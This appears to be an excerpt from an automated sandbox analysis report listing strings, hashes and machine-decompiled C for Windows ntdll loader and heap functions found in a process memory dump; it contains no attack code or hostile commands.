0x048e3dfe
0x048e3e01
0x048e3e01
0x048e3e06
0x0493824d
0x0493824f
0x04938254
0x00000000
0x048e3e0c
0x048e3e11
0x048e3e16
0x048e3e19
0x048e3e29
0x048e3e2c
0x048e3e2f
0x0493825c
0x0493825f
0x04938261
0x04938264
0x0493826c
0x04938280
0x04938282
0x04938282
0x04938289
0x04938290
0x04938293
0x04938294
0x04938298
0x0493829b
0x0493829b
0x048e3e35
0x048e3e38
0x048e3e3d
0x048e3e44
0x048e3e58
0x049382a3
0x049382a3
0x048e3e58
0x048e3e60
0x048e3e6f
0x048e3e74
0x048e3e77
0x048e3e77
0x048e3e7a
0x048e3e7f
0x048e3e8c
0x048e3e8c
0x048e3e91
0x00000000
0x048e3e91

Strings

WindowsExcludedProcs, xrefs: 048E3D6F
Kernel-MUI-Language-SKU, xrefs: 048E3F70
Kernel-MUI-Number-Allowed, xrefs: 048E3D8C
Kernel-MUI-Language-Disallowed, xrefs: 048E3E97
Kernel-MUI-Language-Allowed, xrefs: 048E3DC0

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 0-258546922
Opcode ID: 24da467e660eac20dfbfc5326abd503111250e3521474493a972cfda0f5d550a
Instruction ID: 72230f7717dd9506cec6523cf2830d4681b0bc4ea6f9fe21fea8380764182652
Opcode Fuzzy Hash: 24da467e660eac20dfbfc5326abd503111250e3521474493a972cfda0f5d550a
Instruction Fuzzy Hash: 06F16B72D00618EFDB11DF99C980AEEB7B9EF49B54F14056AE905E7210E774BE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 04908E00, Relevance: 6.4, Strings: 5, Instructions: 126
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E04908E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x49cd360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x49c8464; // 0x74790110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x49c5780 & 0x00000003) != 0) {
							E04955510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x49c5780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E0491B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x49c7984; // 0x513e68
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x49c8464; // 0x74790110
					 *0x49cb1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E04909B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x49c5780 & 0x00000005) != 0) {
						_push(_t49);
						E04955510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}

0x04908e0f
0x04908e16
0x04908e19
0x04908e1b
0x04908e21
0x04908e7f
0x04908e85
0x04949354
0x0494936c
0x04949371
0x0494937b
0x04949381
0x04949381
0x0494937b
0x04908e9d
0x04908e9d
0x04908e29
0x04908e2c
0x04908e38
0x04908e3e
0x04908e43
0x04908eb5
0x04908eb9
0x049492aa
0x049492af
0x049492e8
0x049492e8
0x049492af
0x04908eb9
0x04908e45
0x04908e53
0x04908e5b
0x04908e5f
0x04908e78
0x04908e78
0x04908e7d
0x04908ec3
0x04908ecd
0x04908ed2
0x04908ed2
0x04908ec5
0x04908ec5
0x00000000
0x04908e7d
0x04908e67
0x04908ea4
0x0494931a
0x00000000
0x00000000
0x04949320
0x04908ea4
0x04908e70
0x04949325
0x04949340
0x04949345
0x04949345
0x04908e76
0x00000000
0x00000000
0x00000000
0x00000000

Strings

Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0494932A
h>Q, xrefs: 04908E2C
Querying the active activation context failed with status 0x%08lx, xrefs: 04949357
minkernel\ntdll\ldrsnap.c, xrefs: 0494933B, 04949367
LdrpFindDllActivationContext, xrefs: 04949331, 0494935D

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$h>Q$minkernel\ntdll\ldrsnap.c
API String ID: 0-1129433987
Opcode ID: ec465d9a012a7fb27aeef12e84b0c8aa8dc12eedccb2ca4486683d95e7de9e87
Instruction ID: 9cc0474a4b5fc21cad531397dbd12ecb658cf11025084f248fe2436fe72e8aa6
Opcode Fuzzy Hash: ec465d9a012a7fb27aeef12e84b0c8aa8dc12eedccb2ca4486683d95e7de9e87
Instruction Fuzzy Hash: 39410362B00315AFDB24FA18C84DA76B6A9AB44758F06C979E848976E1E774BC8087C1

Uniqueness

Uniqueness Score: -1.00%

Function 048D40E1, Relevance: 6.3, Strings: 5, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E048D40E1(void* __edx) {
				void* _t19;
				void* _t29;

				_t28 = _t19;
				_t29 = __edx;
				if( *((intOrPtr*)(_t19 + 0x60)) != 0xeeffeeff) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push("HEAP: ");
						E048DB150();
					} else {
						E048DB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E048DB150("Invalid heap signature for heap at %p", _t28);
					if(_t29 != 0) {
						E048DB150(", passed to %s", _t29);
					}
					_push("\n");
					E048DB150();
					if( *((char*)( *[fs:0x30] + 2)) != 0) {
						 *0x49c6378 = 1;
						asm("int3");
						 *0x49c6378 = 0;
					}
					return 0;
				}
				return 1;
			}

0x048d40e6
0x048d40e8
0x048d40f1
0x0493042d
0x0493044c
0x04930451
0x0493042f
0x04930444
0x04930449
0x0493045d
0x04930466
0x0493046e
0x04930474
0x04930475
0x0493047a
0x0493048a
0x0493048c
0x04930493
0x04930494
0x04930494
0x00000000
0x0493049b
0x00000000

Strings

, passed to %s, xrefs: 04930469
RtlAllocateHeap, xrefs: 04930468
Invalid heap signature for heap at %p, xrefs: 04930458
HEAP: , xrefs: 0493044C
HEAP[%wZ]: , xrefs: 0493043F

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlAllocateHeap
API String ID: 0-188067316
Opcode ID: 243fd0d5abdae08c5fc58b46d66248dbd07491d7ddb240ad4059d744f97bec9d
Instruction ID: 1656c8062e42d87d83944356933b9b00d91a0c8fa4b44a48fb89ad0bf5efdef4
Opcode Fuzzy Hash: 243fd0d5abdae08c5fc58b46d66248dbd07491d7ddb240ad4059d744f97bec9d
Instruction Fuzzy Hash: 1F0128322052419FE6199768E41DF9277F8DB01F35F19893DF008D7B8AFAE8B880C592

Uniqueness

Uniqueness Score: -1.00%

Function 049949A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON

Download Yara Rule

Strings

Heap %p - headers modified (%p is %lx instead of %lx), xrefs: 04994A61
This is located in the %s field of the heap header., xrefs: 04994AD6
HEAP: , xrefs: 04994A4A, 04994A5D, 04994A5F, 04994AC4
HEAP[%wZ]: , xrefs: 04994A3D, 04994AB7

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
API String ID: 2994545307-336120773
Opcode ID: 488828bdbdc96b99273a30c42c16dfa3ece92fc9923559e207545770341c82a5
Instruction ID: c593a9d585eb1399fee1486009524110811759e7bcdd9562ddb76a7845993aa5
Opcode Fuzzy Hash: 488828bdbdc96b99273a30c42c16dfa3ece92fc9923559e207545770341c82a5
Instruction Fuzzy Hash: BD311331206104EFEB12DB9CC888F6773E9EF04B64F154A79F405DB250E674BC81CA99

Uniqueness

Uniqueness Score: -1.00%

Function 048E8794, Relevance: 4.0, Strings: 3, Instructions: 255
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E048E8794(void* __ecx) {
				signed int _v0;
				char _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				signed int _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t77;
				signed int _t80;
				signed char _t81;
				signed int _t87;
				signed int _t91;
				void* _t92;
				void* _t94;
				signed int _t95;
				signed int _t103;
				signed int _t105;
				signed int _t110;
				signed int _t118;
				intOrPtr* _t121;
				intOrPtr _t122;
				signed int _t125;
				signed int _t129;
				signed int _t131;
				signed int _t134;
				signed int _t136;
				signed int _t143;
				signed int* _t147;
				signed int _t151;
				void* _t153;
				signed int* _t157;
				signed int _t159;
				signed int _t161;
				signed int _t166;
				signed int _t168;

				_push(__ecx);
				_t153 = __ecx;
				_t159 = 0;
				_t121 = __ecx + 0x3c;
				if( *_t121 == 0) {
					L2:
					_t77 =  *((intOrPtr*)(_t153 + 0x58));
					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
						_t122 =  *((intOrPtr*)(_t153 + 0x20));
						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
							L6:
							if(E048E934A() != 0) {
								_t159 = E0495A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
								__eflags = _t159;
								if(_t159 < 0) {
									_t81 =  *0x49c5780; // 0x0
									__eflags = _t81 & 0x00000003;
									if((_t81 & 0x00000003) != 0) {
										_push(_t159);
										E04955510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
										_t81 =  *0x49c5780; // 0x0
									}
									__eflags = _t81 & 0x00000010;
									if((_t81 & 0x00000010) != 0) {
										asm("int3");
									}
								}
							}
						} else {
							_t159 = E048E849B(0, _t122, _t153, _t159, _t180);
							if(_t159 >= 0) {
								goto L6;
							}
						}
						_t80 = _t159;
						goto L8;
					} else {
						_t125 = 0x13;
						asm("int 0x29");
						_push(0);
						_push(_t159);
						_t161 = _t125;
						_t87 =  *( *[fs:0x30] + 0x1e8);
						_t143 = 0;
						_v40 = _t161;
						_t118 = 0;
						_push(_t153);
						__eflags = _t87;
						if(_t87 != 0) {
							_t118 = _t87 + 0x5d8;
							__eflags = _t118;
							if(_t118 == 0) {
								L46:
								_t118 = 0;
							} else {
								__eflags =  *(_t118 + 0x30);
								if( *(_t118 + 0x30) == 0) {
									goto L46;
								}
							}
						}
						_v32 = 0;
						_v28 = 0;
						_v16 = 0;
						_v20 = 0;
						_v12 = 0;
						__eflags = _t118;
						if(_t118 != 0) {
							__eflags = _t161;
							if(_t161 != 0) {
								__eflags =  *(_t118 + 8);
								if( *(_t118 + 8) == 0) {
									L22:
									_t143 = 1;
									__eflags = 1;
								} else {
									_t19 = _t118 + 0x40; // 0x40
									_t156 = _t19;
									E048E8999(_t19,  &_v16);
									__eflags = _v0;
									if(_v0 != 0) {
										__eflags = _v0 - 1;
										if(_v0 != 1) {
											goto L22;
										} else {
											_t128 =  *(_t161 + 0x64);
											__eflags =  *(_t161 + 0x64);
											if( *(_t161 + 0x64) == 0) {
												goto L22;
											} else {
												E048E8999(_t128,  &_v12);
												_t147 = _v12;
												_t91 = 0;
												__eflags = 0;
												_t129 =  *_t147;
												while(1) {
													__eflags =  *((intOrPtr*)(0x49c5c60 + _t91 * 8)) - _t129;
													if( *((intOrPtr*)(0x49c5c60 + _t91 * 8)) == _t129) {
														break;
													}
													_t91 = _t91 + 1;
													__eflags = _t91 - 5;
													if(_t91 < 5) {
														continue;
													} else {
														_t131 = 0;
														__eflags = 0;
													}
													L37:
													__eflags = _t131;
													if(_t131 != 0) {
														goto L22;
													} else {
														__eflags = _v16 - _t147;
														if(_v16 != _t147) {
															goto L22;
														} else {
															E048F2280(_t92, 0x49c86cc);
															_t94 = E049A9DFB( &_v20);
															__eflags = _t94 - 1;
															if(_t94 != 1) {
															}
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															_t95 = E049061A0( &_v32);
															__eflags = _t95;
															if(_t95 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t71 = _t118 + 0x40; // 0x3f
																	_t134 = _t71;
																	goto L55;
																}
															}
															goto L30;
														}
													}
													goto L56;
												}
												_t92 = 0x49c5c64 + _t91 * 8;
												asm("lock xadd [eax], ecx");
												_t131 = (_t129 | 0xffffffff) - 1;
												goto L37;
											}
										}
										goto L56;
									} else {
										_t143 = E048E8A0A( *((intOrPtr*)(_t161 + 0x18)),  &_v12);
										__eflags = _t143;
										if(_t143 != 0) {
											_t157 = _v12;
											_t103 = 0;
											__eflags = 0;
											_t136 =  &(_t157[1]);
											 *(_t161 + 0x64) = _t136;
											_t151 =  *_t157;
											_v20 = _t136;
											while(1) {
												__eflags =  *((intOrPtr*)(0x49c5c60 + _t103 * 8)) - _t151;
												if( *((intOrPtr*)(0x49c5c60 + _t103 * 8)) == _t151) {
													break;
												}
												_t103 = _t103 + 1;
												__eflags = _t103 - 5;
												if(_t103 < 5) {
													continue;
												}
												L21:
												_t105 = E0491F380(_t136, 0x48b1184, 0x10);
												__eflags = _t105;
												if(_t105 != 0) {
													__eflags =  *_t157 -  *_v16;
													if( *_t157 >=  *_v16) {
														goto L22;
													} else {
														asm("cdq");
														_t166 = _t157[5] & 0x0000ffff;
														_t108 = _t157[5] & 0x0000ffff;
														asm("cdq");
														_t168 = _t166 << 0x00000010 | _t157[5] & 0x0000ffff;
														__eflags = ((_t151 << 0x00000020 | _t166) << 0x10 | _t151) -  *((intOrPtr*)(_t118 + 0x2c));
														if(__eflags > 0) {
															L29:
															E048F2280(_t108, 0x49c86cc);
															 *_t118 =  *_t118 + 1;
															_t42 = _t118 + 0x40; // 0x3f
															_t156 = _t42;
															asm("adc dword [ebx+0x4], 0x0");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															asm("movsd");
															_t110 = E049061A0( &_v32);
															__eflags = _t110;
															if(_t110 != 0) {
																__eflags = _v32 | _v28;
																if((_v32 | _v28) != 0) {
																	_t134 = _v20;
																	L55:
																	E049A9D2E(_t134, 1, _v32, _v28,  *(_v24 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_v24 + 0x28)));
																}
															}
															L30:
															 *_t118 =  *_t118 + 1;
															asm("adc dword [ebx+0x4], 0x0");
															E048EFFB0(_t118, _t156, 0x49c86cc);
															goto L22;
														} else {
															if(__eflags < 0) {
																goto L22;
															} else {
																__eflags = _t168 -  *((intOrPtr*)(_t118 + 0x28));
																if(_t168 <  *((intOrPtr*)(_t118 + 0x28))) {
																	goto L22;
																} else {
																	goto L29;
																}
															}
														}
													}
													goto L56;
												}
												goto L22;
											}
											asm("lock inc dword [eax]");
											goto L21;
										}
									}
								}
							}
						}
						return _t143;
					}
				} else {
					_push( &_v8);
					_push( *((intOrPtr*)(__ecx + 0x50)));
					_push(__ecx + 0x40);
					_push(_t121);
					_push(0xffffffff);
					_t80 = E04919A00();
					_t159 = _t80;
					if(_t159 < 0) {
						L8:
						return _t80;
					} else {
						goto L2;
					}
				}
				L56:
			}

0x048e8799
0x048e879d
0x048e87a1
0x048e87a3
0x048e87a8
0x048e87c3
0x048e87c3
0x048e87c8
0x048e87d1
0x048e87d4
0x048e87d8
0x048e87e5
0x048e87ec
0x04939bfe
0x04939c00
0x04939c02
0x04939c08
0x04939c0d
0x04939c0f
0x04939c14
0x04939c2d
0x04939c32
0x04939c37
0x04939c3a
0x04939c3c
0x04939c42
0x04939c42
0x04939c3c
0x04939c02
0x048e87da
0x048e87df
0x048e87e3
0x00000000
0x00000000
0x048e87e3
0x048e87f2
0x00000000
0x048e87fb
0x048e87fd
0x048e87fe
0x048e880e
0x048e880f
0x048e8810
0x048e8814
0x048e881a
0x048e881c
0x048e881f
0x048e8821
0x048e8822
0x048e8824
0x048e8826
0x048e882c
0x048e882e
0x04939c48
0x04939c48
0x048e8834
0x048e8834
0x048e8837
0x00000000
0x00000000
0x048e8837
0x048e882e
0x048e883d
0x048e8840
0x048e8843
0x048e8846
0x048e8849
0x048e884c
0x048e884e
0x048e8850
0x048e8852
0x048e8854
0x048e8857
0x048e88b4
0x048e88b6
0x048e88b6
0x048e8859
0x048e8859
0x048e8859
0x048e8861
0x048e8866
0x048e886a
0x048e893d
0x048e8941
0x00000000
0x048e8947
0x048e8947
0x048e894a
0x048e894c
0x00000000
0x048e8952
0x048e8955
0x048e895a
0x048e895d
0x048e895d
0x048e895f
0x048e8961
0x048e8961
0x048e8968
0x00000000
0x00000000
0x048e896a
0x048e896b
0x048e896e
0x00000000
0x048e8970
0x048e8970
0x048e8970
0x048e8970
0x048e8972
0x048e8972
0x048e8974
0x00000000
0x048e897a
0x048e897a
0x048e897d
0x00000000
0x048e8983
0x04939c65
0x04939c6d
0x04939c72
0x04939c75
0x04939c75
0x04939c82
0x04939c86
0x04939c87
0x04939c88
0x04939c89
0x04939c8c
0x04939c90
0x04939c95
0x04939c97
0x04939ca0
0x04939ca3
0x04939ca9
0x04939ca9
0x00000000
0x04939ca9
0x04939ca3
0x00000000
0x04939c97
0x048e897d
0x00000000
0x048e8974
0x048e8988
0x048e8992
0x048e8996
0x00000000
0x048e8996
0x048e894c
0x00000000
0x048e8870
0x048e887b
0x048e887d
0x048e887f
0x048e8881
0x048e8884
0x048e8884
0x048e8886
0x048e8889
0x048e888c
0x048e888e
0x048e8891
0x048e8891
0x048e8898
0x00000000
0x00000000
0x048e889a
0x048e889b
0x048e889e
0x00000000
0x00000000
0x048e88a0
0x048e88a8
0x048e88b0
0x048e88b2
0x048e88d3
0x048e88d5
0x00000000
0x048e88d7
0x048e88db
0x048e88dc
0x048e88e0
0x048e88e8
0x048e88ee
0x048e88f0
0x048e88f3
0x048e88fc
0x048e8901
0x048e8906
0x048e890c
0x048e890c
0x048e890f
0x048e8916
0x048e8917
0x048e8918
0x048e8919
0x048e891a
0x048e891f
0x048e8921
0x04939c52
0x04939c55
0x04939c5b
0x04939cac
0x04939cc0
0x04939cc0
0x04939c55
0x048e8927
0x048e8927
0x048e892f
0x048e8933
0x00000000
0x048e88f5
0x048e88f5
0x00000000
0x048e88f7
0x048e88f7
0x048e88fa
0x00000000
0x00000000
0x00000000
0x00000000
0x048e88fa
0x048e88f5
0x048e88f3
0x00000000
0x048e88d5
0x00000000
0x048e88b2
0x048e88c9
0x00000000
0x048e88c9
0x048e887f
0x048e886a
0x048e8857
0x048e8852
0x048e88bf
0x048e88bf
0x048e87aa
0x048e87ad
0x048e87ae
0x048e87b4
0x048e87b5
0x048e87b6
0x048e87b8
0x048e87bd
0x048e87c1
0x048e87f4
0x048e87fa
0x00000000
0x00000000
0x00000000
0x048e87c1
0x00000000

Strings

LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 04939C18
LdrpDoPostSnapWork, xrefs: 04939C1E
minkernel\ntdll\ldrsnap.c, xrefs: 04939C28

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: a06249583e7fbdd848606bd505548023b78cee22e88bae50a62e75fce24091d5
Instruction ID: 5e396239028f3285dff4a86b077f32e3857d428a5ad852971e38ced78d3667e0
Opcode Fuzzy Hash: a06249583e7fbdd848606bd505548023b78cee22e88bae50a62e75fce24091d5
Instruction Fuzzy Hash: 1D911671A00219AFDB18EF5AC880ABEB3B5FF86354B154A69DD05EB240E770FD01DB91

Uniqueness

Uniqueness Score: -1.00%

Function 048E7E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E048E7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E048ECEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E048DC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x49c5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E04955510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x49c5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E048F7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048F7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E04957016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E048F7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E048F7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E04957016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0490A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E048DB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x048e7e4c
0x048e7e50
0x048e7e55
0x048e7e58
0x048e7e5d
0x048e7e71
0x048e7f33
0x048e7e77
0x048e7e77
0x048e7e79
0x048e7e79
0x048e7e7e
0x048e7f45
0x04939848
0x00000000
0x04939848
0x048e7f4e
0x048e7f53
0x048e7f5a
0x00000000
0x00000000
0x0493985a
0x04939862
0x04939866
0x00000000
0x0493986c
0x00000000
0x0493986c
0x048e7e84
0x048e7e84
0x048e7e8d
0x04939871
0x048e7eb8
0x048e7ec0
0x048e7ec0
0x048e7e9a
0x0493987e
0x00000000
0x00000000
0x04939884
0x0493988b
0x049398a7
0x049398ac
0x049398b1
0x049398b6
0x049398b8
0x049398b8
0x049398b9
0x00000000
0x049398b9
0x048e7ea0
0x048e7ea7
0x00000000
0x00000000
0x048e7eac
0x048e7eb1
0x048e7ec6
0x048e7ed0
0x049398cc
0x048e7ed6
0x048e7ed6
0x048e7ed6
0x048e7ede
0x048e7ee3
0x049398e3
0x049398f0
0x04939902
0x049398f2
0x049398fb
0x049398fb
0x04939907
0x0493991d
0x0493991d
0x04939907
0x049398e3
0x048e7ef0
0x048e7f14
0x048e7f14
0x048e7f1e
0x04939946
0x048e7f24
0x048e7f24
0x048e7f24
0x048e7f2c
0x0493996a
0x04939975
0x04939975
0x0493997e
0x04939993
0x04939993
0x0493997e
0x00000000
0x048e7ef2
0x048e7efc
0x048e7f0a
0x048e7f0e
0x04939933
0x00000000
0x04939933
0x00000000
0x048e7f0e
0x00000000
0x00000000
0x00000000
0x048e7eb1

Strings

minkernel\ntdll\ldrmap.c, xrefs: 049398A2
Could not validate the crypto signature for DLL %wZ, xrefs: 04939891
LdrpCompleteMapModule, xrefs: 04939898

Memory Dump Source

Source File: 00000006.00000002.608016293.00000000048B0000.00000040.00000001.sdmp, Offset: 048B0000, based on PE: true

Associated: 00000006.00000002.609135839.00000000049CB000.00000040.00000001.sdmp Download File
Associated: 00000006.00000002.609175517.00000000049CF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: 3e10ecfa98608c706b58b37f8748f5d6940cfb632c901d3667ac0f1807553750
Instruction ID: f1d55584b55326b629395b57e856df0b83e9458cf5c71ddd1ca1fc630e13efc6
Opcode Fuzzy Hash: 3e10ecfa98608c706b58b37f8748f5d6940cfb632c901d3667ac0f1807553750
Instruction Fuzzy Hash: C0510071A007469FEB21CF69C844B7AB7E4AB42B18F040AA5E951DB3D1D7B4FD00CB91

Uniqueness

Uniqueness Score: -1.00%

